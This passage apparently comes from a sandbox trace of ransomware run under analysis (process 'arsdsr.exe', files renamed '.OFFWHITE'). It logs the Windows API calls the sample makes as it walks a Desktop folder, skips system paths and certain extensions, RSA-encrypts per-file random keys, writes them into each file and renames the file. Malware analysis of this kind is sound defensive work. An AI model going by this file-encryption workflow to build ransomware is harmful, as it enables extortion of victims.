returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.499] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.499] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\*.*" [0132.500] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b14cd20, ftCreationTime.dwHighDateTime=0x1d5e4fd, ftLastAccessTime.dwLowDateTime=0x4a11f230, ftLastAccessTime.dwHighDateTime=0x1d5d90d, ftLastWriteTime.dwLowDateTime=0x4a11f230, ftLastWriteTime.dwHighDateTime=0x1d5d90d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName=".", cAlternateFileName="")) returned 0x544650 [0132.502] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.502] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b14cd20, ftCreationTime.dwHighDateTime=0x1d5e4fd, ftLastAccessTime.dwLowDateTime=0x4a11f230, ftLastAccessTime.dwHighDateTime=0x1d5d90d, ftLastWriteTime.dwLowDateTime=0x4a11f230, ftLastWriteTime.dwHighDateTime=0x1d5d90d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="..", cAlternateFileName="")) returned 1 [0132.502] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.502] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.502] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77b55f10, ftCreationTime.dwHighDateTime=0x1d5daf7, ftLastAccessTime.dwLowDateTime=0x9a725ae0, ftLastAccessTime.dwHighDateTime=0x1d5d7d1, ftLastWriteTime.dwLowDateTime=0x9a725ae0, ftLastWriteTime.dwHighDateTime=0x1d5d7d1, nFileSizeHigh=0x0, nFileSizeLow=0x188c2, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="6v-EBPmoucsfP9t_fqM.flv", cAlternateFileName="6V-EBP~1.FLV")) returned 1 [0132.502] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2=".") returned 1 [0132.502] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="..") returned 1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="...") returned 1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="windows") returned -1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="$recycle.bin") returned 1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="rsa") returned -1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="ntuser.dat") returned -1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="programdata") returned -1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="appdata") returned -1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="program files") returned -1 [0132.503] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="program files (x86)") returned -1 [0132.503] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.503] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\", lpString2="6v-EBPmoucsfP9t_fqM.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv" [0132.503] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.503] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.503] PathFindExtensionW (pszPath="6v-EBPmoucsfP9t_fqM.flv") returned=".flv" [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".exe") returned 1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".log") returned -1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".cab") returned 1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".cmd") returned 1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".com") returned 1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".cpl") returned 1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0132.503] lstrcmpiW (lpString1=".flv", lpString2=".url") returned -1 [0132.504] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0132.504] lstrcmpiW (lpString1=".flv", lpString2=".mp3") returned -1 [0132.504] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0132.504] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0132.504] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0132.504] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0132.504] lstrcmpiW (lpString1="6v-EBPmoucsfP9t_fqM.flv", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.504] GetProcessHeap () returned 0x500000 [0132.504] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f528 [0132.504] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\6v-ebpmoucsfp9t_fqm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.504] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=100546) returned 1 [0132.504] GetProcessHeap () returned 0x500000 [0132.504] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.504] GetProcessHeap () returned 0x500000 [0132.504] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.504] GetProcessHeap () returned 0x500000 [0132.505] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.505] GetProcessHeap () returned 0x500000 [0132.505] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.505] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.505] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.505] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.505] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.505] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.505] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.505] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.505] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.505] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.505] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.505] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.505] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.506] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x188c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.506] SetLastError (dwErrCode=0x0) [0132.506] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.508] GetLastError () returned 0x0 [0132.508] GetLastError () returned 0x0 [0132.508] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x189c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.508] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.509] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18ac2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.509] WriteFile (in: hFile=0x21c, lpBuffer=0x53f528*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f528*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.509] GetProcessHeap () returned 0x500000 [0132.509] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x188c2) returned 0x5587b8 [0132.509] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.509] ReadFile (in: hFile=0x21c, lpBuffer=0x5587b8, nNumberOfBytesToRead=0x188c2, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesRead=0x295dec0*=0x188c2, lpOverlapped=0x0) returned 1 [0132.518] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.518] WriteFile (in: hFile=0x21c, lpBuffer=0x5587b8*, nNumberOfBytesToWrite=0x188c2, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesWritten=0x295decc*=0x188c2, lpOverlapped=0x0) returned 1 [0132.519] GetProcessHeap () returned 0x500000 [0132.519] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5587b8 | out: hHeap=0x500000) returned 1 [0132.519] CloseHandle (hObject=0x21c) returned 1 [0132.521] GetProcessHeap () returned 0x500000 [0132.521] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.521] GetProcessHeap () returned 0x500000 [0132.521] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.521] GetProcessHeap () returned 0x500000 [0132.521] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.521] GetProcessHeap () returned 0x500000 [0132.521] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.521] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv" [0132.521] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv.OFFWHITE" [0132.521] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\6v-ebpmoucsfp9t_fqm.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\6v-EBPmoucsfP9t_fqM.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\6v-ebpmoucsfp9t_fqm.flv.offwhite")) returned 1 [0132.522] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd974df70, ftCreationTime.dwHighDateTime=0x1d5db8b, ftLastAccessTime.dwLowDateTime=0xc3b4c8f0, ftLastAccessTime.dwHighDateTime=0x1d5e09d, ftLastWriteTime.dwLowDateTime=0xc3b4c8f0, ftLastWriteTime.dwHighDateTime=0x1d5e09d, nFileSizeHigh=0x0, nFileSizeLow=0x18af2, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="BWPNV.ots", cAlternateFileName="")) returned 1 [0132.522] lstrcmpiW (lpString1="BWPNV.ots", lpString2=".") returned 1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="..") returned 1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="...") returned 1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="windows") returned -1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="$recycle.bin") returned 1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="rsa") returned -1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="ntuser.dat") returned -1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="programdata") returned -1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="appdata") returned 1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="program files") returned -1 [0132.523] lstrcmpiW (lpString1="BWPNV.ots", lpString2="program files (x86)") returned -1 [0132.523] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.523] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\", lpString2="BWPNV.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots" [0132.523] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.523] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.523] PathFindExtensionW (pszPath="BWPNV.ots") returned=".ots" [0132.523] lstrcmpiW (lpString1=".ots", lpString2=".exe") returned 1 [0132.523] lstrcmpiW (lpString1=".ots", lpString2=".log") returned 1 [0132.523] lstrcmpiW (lpString1=".ots", lpString2=".cab") returned 1 [0132.523] lstrcmpiW (lpString1=".ots", lpString2=".cmd") returned 1 [0132.523] lstrcmpiW (lpString1=".ots", lpString2=".com") returned 1 [0132.523] lstrcmpiW (lpString1=".ots", lpString2=".cpl") returned 1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".url") returned -1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".ttf") returned -1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".mp3") returned 1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".pif") returned -1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".mp4") returned 1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".OFFWHITE") returned 1 [0132.524] lstrcmpiW (lpString1=".ots", lpString2=".msi") returned 1 [0132.524] lstrcmpiW (lpString1="BWPNV.ots", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.524] GetProcessHeap () returned 0x500000 [0132.524] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f538 [0132.524] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\bwpnv.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.525] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=101106) returned 1 [0132.525] GetProcessHeap () returned 0x500000 [0132.525] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.525] GetProcessHeap () returned 0x500000 [0132.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.526] GetProcessHeap () returned 0x500000 [0132.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.526] GetProcessHeap () returned 0x500000 [0132.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.526] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.526] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.526] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.527] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.527] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.527] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.527] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.527] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.527] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.528] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.528] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.528] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.528] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18af2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.528] SetLastError (dwErrCode=0x0) [0132.528] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.532] GetLastError () returned 0x0 [0132.532] GetLastError () returned 0x0 [0132.532] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18bf2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.532] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.532] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18cf2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.532] WriteFile (in: hFile=0x21c, lpBuffer=0x53f538*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f538*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.533] GetProcessHeap () returned 0x500000 [0132.533] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18af2) returned 0x5587b8 [0132.533] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.533] ReadFile (in: hFile=0x21c, lpBuffer=0x5587b8, nNumberOfBytesToRead=0x18af2, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesRead=0x295dec0*=0x18af2, lpOverlapped=0x0) returned 1 [0132.540] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.540] WriteFile (in: hFile=0x21c, lpBuffer=0x5587b8*, nNumberOfBytesToWrite=0x18af2, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesWritten=0x295decc*=0x18af2, lpOverlapped=0x0) returned 1 [0132.541] GetProcessHeap () returned 0x500000 [0132.541] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5587b8 | out: hHeap=0x500000) returned 1 [0132.541] CloseHandle (hObject=0x21c) returned 1 [0132.544] GetProcessHeap () returned 0x500000 [0132.544] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.544] GetProcessHeap () returned 0x500000 [0132.544] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.544] GetProcessHeap () returned 0x500000 [0132.544] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.544] GetProcessHeap () returned 0x500000 [0132.544] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.544] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots" [0132.544] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots.OFFWHITE" [0132.545] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\bwpnv.ots"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\BWPNV.ots.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\bwpnv.ots.offwhite")) returned 1 [0132.546] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d4d0b0, ftCreationTime.dwHighDateTime=0x1d5dfb1, ftLastAccessTime.dwLowDateTime=0x5038fff0, ftLastAccessTime.dwHighDateTime=0x1d5e20e, ftLastWriteTime.dwLowDateTime=0x5038fff0, ftLastWriteTime.dwHighDateTime=0x1d5e20e, nFileSizeHigh=0x0, nFileSizeLow=0xfbb, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="hVFTUWDO.mp3", cAlternateFileName="")) returned 1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2=".") returned 1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="..") returned 1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="...") returned 1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="windows") returned -1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="$recycle.bin") returned 1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="rsa") returned -1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="ntuser.dat") returned -1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="programdata") returned -1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="appdata") returned 1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="program files") returned -1 [0132.546] lstrcmpiW (lpString1="hVFTUWDO.mp3", lpString2="program files (x86)") returned -1 [0132.546] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\" [0132.547] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\", lpString2="hVFTUWDO.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\hVFTUWDO.mp3") returned="C:/Users\\5p5NrGJn0jS 